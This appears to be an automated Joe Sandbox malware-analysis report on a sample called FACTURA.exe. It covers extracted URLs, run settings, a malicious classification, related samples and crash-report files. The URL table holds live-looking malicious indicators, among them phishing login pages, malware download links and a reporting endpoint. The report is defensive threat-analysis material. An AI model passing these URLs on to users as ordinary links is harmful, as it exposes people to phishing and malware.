http://5starvideos.com/main/K5	MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://aklick.info/d.php?date=	MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://77.81.225.138/carnaval2017.zip	MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.slotch.com/ist/softwares/v4.0/istdownload.exe	MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://go.wikitextbooks.info	MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://aartemis.com/?type=sc&ts=	MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	false		high
https://tinyurl.com/up77pck	MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	false		high
https://bemojo.com/ds/161120.gif	MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://esiglass.it/glassclass/glass.php	MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://xmrig.com/wizard	MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://rotf.lol/3u6d9443	MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin	MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://aerytyre.blogspot.com/	MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	false		high
http://blogsemasacaparnab.blogspot.com/	MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	false		high
https://eeyhh567.s3.eu-west-3.amazonaws.com/image2.png	MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	false		high
https://mort2021.s3-eu-west-1.amazonaws.com/image2.png	MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	false		high
http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android	MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.niepicowane.pl/	MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://office-service-secs.com/blm.task	MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bit.ly/3kvdcmi	MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	false		high
https://irecruiter.immentia.com/storage/framework/cache/data/0e/nC7vWe43YwJjj.php	MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://js.f4321y.com/	MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.searchmaid.com/	MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://remote.bittorrent.com	MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	false		high
http://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gfbs	MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	false		high
http://tbapi.search.ask.comxb	MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mva.by/tags/ariscanin1.e	MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://masgiO.info/cd/cd.php?id=%s&ver=g	MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://sds.clrsch.com/x	MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://blackstonesbarandgrill.net/wp-includes/js/service/jp/login.php	MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
http://boscumix.com/optima/index.php	MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://playsong.mediasongplayer.com/	MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://207.154.225.82/report.json?type=mail&u=$muser&c=	MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xiuzhe.com/ddvan.exe	MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://t.zer9g.com/	MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://149.3.170.235/qw-fad/	MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://maringareservas.com.br/queda/index.php	MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc	MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://seunelson.com.br/js/content.xml	MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://costacars.es/ico/ortodox.php	MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://82.98.235.	MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://verred.net/?1309921	MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://pigeonious.com/img/	MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.trotux.com/?z=	MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	false		high
http://artishollywoodbikini.blogspot.com/	MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	false		high
http://data1.yoou8.com/	MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php	MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://bit.ly/3kthd4j	MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	false		high
http://handjobheats.com/xgi-bin/q.php	MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pcpurifier.com/buynow/?	MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://avnisevinc.blogspot.com/	MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	false		high
http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET	MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://longurl.in/tllwu	MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://%63%61%39%78%2e%63%6f%6d/ken.gif	MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://logs-01.loggly.com/inputs	MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	false		high
https://cdn4.buysellads.net/pub/tempmail.js?	MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mybrowserbar.com/cgi/coupons.cgi/	MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://200.159.128.	MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://agressor58.blogspot.com/	MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	false		high
http://bdsmforyoungs.blogspot.com/	MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	false		high
http://psynergi.dk/data	MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://mndyprivatecloudshareandfileprotecthmvb.freeddns.org/receipt/invoice_	MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.ee/r/26jiy/0	MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	false		high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	1568
Start date:	08.10.2021
Start time:	11:00:42
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 20m 59s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	FACTURA.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@13/235@1/0
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, MusNotificationUx.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, conhost.exe, svchost.exe Created / dropped Files have been reduced to 100 Excluded IPs from analysis (whitelisted): 52.242.97.97, 52.152.108.96, 40.125.122.151, 20.54.89.106, 20.82.19.171, 20.82.207.122, 20.199.120.151, 20.82.209.183, 92.123.224.124, 92.123.224.60, 104.208.16.94, 20.50.102.62, 20.199.120.182, 52.152.110.14, 104.89.38.104, 2.21.143.74, 2.21.140.235, 20.199.120.85, 40.126.31.141, 40.126.31.143, 20.190.159.134, 40.126.31.4, 20.190.159.138, 40.126.31.137, 40.126.31.139, 40.126.31.6, 20.42.73.29 Excluded domains from analysis (whitelisted): definitionupdates.microsoft.com.edgekey.net, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, a1449.dscg2.akamai.net, arc.msn.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, fe3.delivery.dsp.mp.microsoft.com.nsatc.net, e11290.dspg.akamaiedge.net, wns.notify.trafficmanager.net, www.microsoft.com-c-3.edgekey.net, go.microsoft.com, login.live.com, onedsblobprdeus15.eastus.cloudapp.azure.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, slscr.update.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com, definitionupdates.microsoft.com, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, e3673.g.akamaiedge.net, sls.update.microsoft.com.akadns.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, www.tm.a.prd.aadg.akadns.net, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wd-prod-cp.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, sls.emea.update.microsoft.com.akadns.net, fe3.delivery.mp.microsoft.com, wdcpalt.microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, umwatson.events.data.microsoft.com, www.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:02:51	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
edge-web.dual-gslb.spotify.com	bpSrG4K6tH.msi	Get hash	malicious	Browse	35.186.224.25
	Proforma invoice Shipping documents.exe	Get hash	malicious	Browse	35.186.224.25
	#U017dIADA#U0164 O PONUKU 07-10-2021#U00b7pdf.exe	Get hash	malicious	Browse	35.186.224.25
	Zahteva za ponudbo 07-10-2021#U00b7pdf.exe	Get hash	malicious	Browse	35.186.224.25
	Zapytanie ofertowe 189245.exe	Get hash	malicious	Browse	35.186.224.25
	Monex Payment Declined CTE21081157582 EUR 81300.00_PDF.exe	Get hash	malicious	Browse	35.186.224.25
	FACTURA.exe	Get hash	malicious	Browse	35.186.224.25
	Swift Copy.exe	Get hash	malicious	Browse	35.186.224.25
	Justificante de la transfer.exe	Get hash	malicious	Browse	35.186.224.25
	Sipari#U015f-05.10..2021.exe	Get hash	malicious	Browse	35.186.224.25
	justificante de la transfer.exe	Get hash	malicious	Browse	35.186.224.25
	udI2NcR8Lj.exe	Get hash	malicious	Browse	35.186.224.25
	bthGMpTA2L.exe	Get hash	malicious	Browse	35.186.224.25
	MT103_SWIFT.exe	Get hash	malicious	Browse	35.186.224.25
	CpUNO6WMEm.exe	Get hash	malicious	Browse	35.186.224.25
	EVLb7JeDaK.dll	Get hash	malicious	Browse	35.186.224.25
	Struggleres5.exe	Get hash	malicious	Browse	35.186.224.25
	Zapytanie ofertowe (SHELMO Sp. z o.o. 09272021).exe	Get hash	malicious	Browse	35.186.224.25
	Pago de factura.exe	Get hash	malicious	Browse	35.186.224.25
	payment confirmation.exe	Get hash	malicious	Browse	35.186.224.25

ASN

No context

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	l8w9YB1n38.exe	Get hash	malicious	Browse
	Monex Payment Declined CTE21081157582 EUR 81300.00_PDF.exe	Get hash	malicious	Browse
	Udtrt.exe	Get hash	malicious	Browse
	MT103_SWIFT.exe	Get hash	malicious	Browse
	MT103_SWIFT.exe	Get hash	malicious	Browse
	EVOLUTION TRADE Sp. z o.o. OFERTA 09212.exe	Get hash	malicious	Browse
	tZz20galQf.exe	Get hash	malicious	Browse
	Guloader.exe	Get hash	malicious	Browse
	8hIPR0n66X.dll	Get hash	malicious	Browse
	Struggleres5.exe	Get hash	malicious	Browse
	FACTURA.exe	Get hash	malicious	Browse
	LISTA DE PEDIDO DE COMPRA.exe	Get hash	malicious	Browse
	Unreal.exe	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_FACTURA.exe_cb81e593c48dde2c87ceaa821c837590e0a7c7_bff3f8cd_d206a9ef-8028-44f6-92fb-9cf809282c0d\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	11732
Entropy (8bit):	3.79062410076042
Encrypted:	false
SSDEEP:	96:m9FAjVIs7l2ok7JAivXIxcQjc6qcElcw3T+HbHg/TVG4rmMoVazWLnNOyEHWmXEP:SajVIVm9uPsjEU1cDu76hfAIO81I
MD5:	8941668CAB60C0215D1EC389145BBDB7
SHA1:	4952BC92170DA42F9FA91C72FF46777F00CF523F
SHA-256:	4D6ED959A3D591CD4C36BEA42B70C547FC9E6EEEF11A9B2FF8B8844FAC34EDE4
SHA-512:	AFE8BC6B46E56862853D28BBE6B2D990ABDC63108B1974F0417CBE0DA9480B84410DD77319F87712890907809A72F8B06803D96CFAE114DBE87E2A249716053F
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.1.6.0.9.6.5.6.5.1.2.5.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.1.6.0.9.6.8.4.4.7.4.7.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.0.6.a.9.e.f.-.8.0.2.8.-.4.4.f.6.-.9.2.f.b.-.9.c.f.8.0.9.2.8.2.c.0.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.e.b.4.e.6.9.-.4.5.4.8.-.4.7.6.3.-.9.8.4.7.-.8.b.b.f.a.f.f.8.5.e.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.F.A.C.T.U.R.A...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.o.u.n.t.e.r.f.o.i.l.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.8.0.-.0.0.0.1.-.0.0.1.1.-.4.b.8.d.-.5.6.9.d.2.b.b.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.7.9.4.a.e.3.6.d.f.0.9.7.b.e.6.3.8.a.5.2.f.8.b.d.4.a.4.a.8.4.f.0.0.0.0.0.9.0.4.!.0.0.0.0.a.9.3.1.0.9.4.8.4.7.6.6.9.3.d.7.2.b.e.9.3.7.f.2.3.e.1.b.5.3.b.3.6.0.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_FACTURA.exe_f1a70186ac6be91eea4c46237a7631b697b3fec_bff3f8cd_540f6c51-464c-4fd2-b6f3-af609fbfd780\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	11644
Entropy (8bit):	3.7843540337003194
Encrypted:	false
SSDEEP:	96:4REdV3s7l2pf7ISZvXIxcQac6pcEccw3Q+HbHg/TVG4rmMoVazWLnNOyEHWmXECA:tV39m0tGNjEU1cDu76WfAIO8Is
MD5:	2AD23BDB55C1B87BD138CBAF872AC194
SHA1:	BB677F56DD5E6E5FA81257F25090AC56A9F120B6
SHA-256:	D25EFD7F048C650730597A81B5159FAEB87A77EF2C922E2A5C59C2F123F9BA65
SHA-512:	8A8BDE480844A4D91DF960404F5C13F682C988AE28015A5C04270BEBD051750731DDFD88381B1638D9F542EDFBB61C739F80C2CE84789E51C8994BA3B0192052
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.1.6.0.9.5.8.4.9.7.6.0.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.0.f.6.c.5.1.-.4.6.4.c.-.4.f.d.2.-.b.6.f.3.-.a.f.6.0.9.f.b.f.d.7.8.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.6.2.c.8.6.a.-.b.d.3.5.-.4.d.3.0.-.9.c.4.d.-.0.b.c.a.6.3.c.7.3.f.4.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.F.A.C.T.U.R.A...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.o.u.n.t.e.r.f.o.i.l.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.8.0.-.0.0.0.1.-.0.0.1.1.-.4.b.8.d.-.5.6.9.d.2.b.b.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.7.9.4.a.e.3.6.d.f.0.9.7.b.e.6.3.8.a.5.2.f.8.b.d.4.a.4.a.8.4.f.0.0.0.0.0.9.0.4.!.0.0.0.0.a.9.3.1.0.9.4.8.4.7.6.6.9.3.d.7.2.b.e.9.3.7.f.2.3.e.1.b.5.3.b.3.6.0.7.b.f.9.2.f.!.F.A.C.T.U.R.A...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.1././.1.0././.0.9.:.2.3.:.1.8.:.3.6.!.2.6.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB13.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 8 10:02:39 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	50612
Entropy (8bit):	2.0716034299451516
Encrypted:	false
SSDEEP:	192:hVG8v9IdWYZ9ZrQfEUbtuWhJTz4y0lnEXQys7HoHEsM:nzvqZrtmTOnEQoHnM
MD5:	23CEFD70E33DC0D6BDC88ED2F3987B40
SHA1:	69FE452C943862189F1FA790D061C3E3CFCCE1BC
SHA-256:	A6C0B0022B40227C0C5EDCAA2E2336C223BD5F53A36FE758792E6B263EAE0B2A
SHA-512:	A60CD3D95AA8A48B34E855FA2A19DA6BAB42C639520F4F0C1336169041608284195C819F37FE9E3AEBF89AD9607DB6B185C6552BB806800D5A3007E5F43CB600
Malicious:	false
Preview:	MDMP..a..... .......?.`a..............................bJ..............GenuineIntel...........T...........:.`a.............................0..2...............G.M.T. .S.t.a.n.d.a.r.d. .T.i.m.e...................................................G.M.T. .D.a.y.l.i.g.h.t. .T.i.m.e...................................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.9.0.4.1...5.4.6.....................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE8F.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8354
Entropy (8bit):	3.6953427483028567
Encrypted:	false
SSDEEP:	192:R9l7lZNiMtX6b6YwDTSUnMDgmfjapvApNW89b9Rh1fa/Bm:R9lnNiMt6b6YoSUnMDgmfjaps9RjfU8
MD5:	E3B35980F5666F714315C3B06351E314
SHA1:	C107494DB837F74F5811B46FC6EFE99AEC9697A0
SHA-256:	0A4B88C1D3A1AB5B29F2A025ACD1168C7A0D2AA7FACF4D68F5809C6203AD4D78
SHA-512:	12C4926A84FCFD9FA0420AAD3E884FC2BB7AD4E8D1919A1638354F7D4EA92A2180671EF6BBA1DD5F22D668B5E996838B8D4A7816EA89ACB595C515DFF5E93D71
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF5B.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4879
Entropy (8bit):	4.494495658736333
Encrypted:	false
SSDEEP:	48:cvIwwtl8zsPe702I7VFJ5WS2Cfjkvms3rm8M4JPDePF9b+q8veDeAQPuBZBd:uILfm7GySPfi5J8KsQPYZBd
MD5:	F9DD9D728E59554057CF0644DD151A4A
SHA1:	E3A98FEDE993EDFC3A0C8140F4934D06263BDFF6
SHA-256:	2BCF71826FA54E3C640C02FEF82A5AEDE5EB0A175A6CE2BE0EF6801124F389A7
SHA-512:	F4E6B523EF71402A6E706F808A8B1356CCDEF66346E78B10D39A4371BF9786C21B7816A255614631E4B743B088BD95BCE6295816E2E931B045F3D70582F18526
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="221299964" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD708.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 8 10:02:46 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	1079572
Entropy (8bit):	1.6381935303241613
Encrypted:	false
SSDEEP:	1536:Y0rEEwgeqMnZHWLQ7DlFOaCtxPcy4zG0dI5OXGFdy+nMmNJw8psUl:QjXWM7Dl8aCtxkBG0drodHnVzpvl
MD5:	96C1BB43466C43560602BB3E8F2A34F4
SHA1:	1A935D79C6A0CD68165D889205052D274D27B28B
SHA-256:	249E26BAFBFC8A7F157A15E9A85E96FFCF44525ABD81371F2587C859DAF8491C
SHA-512:	6DF8B1642BEACAB1E36F077C1BD2BC23982199CDC4D9818241CF317BA4B09186E92B036C167AC4E19FB0F0807D834599DA42E7B45264362A072C0878AC314FB5
Malicious:	false
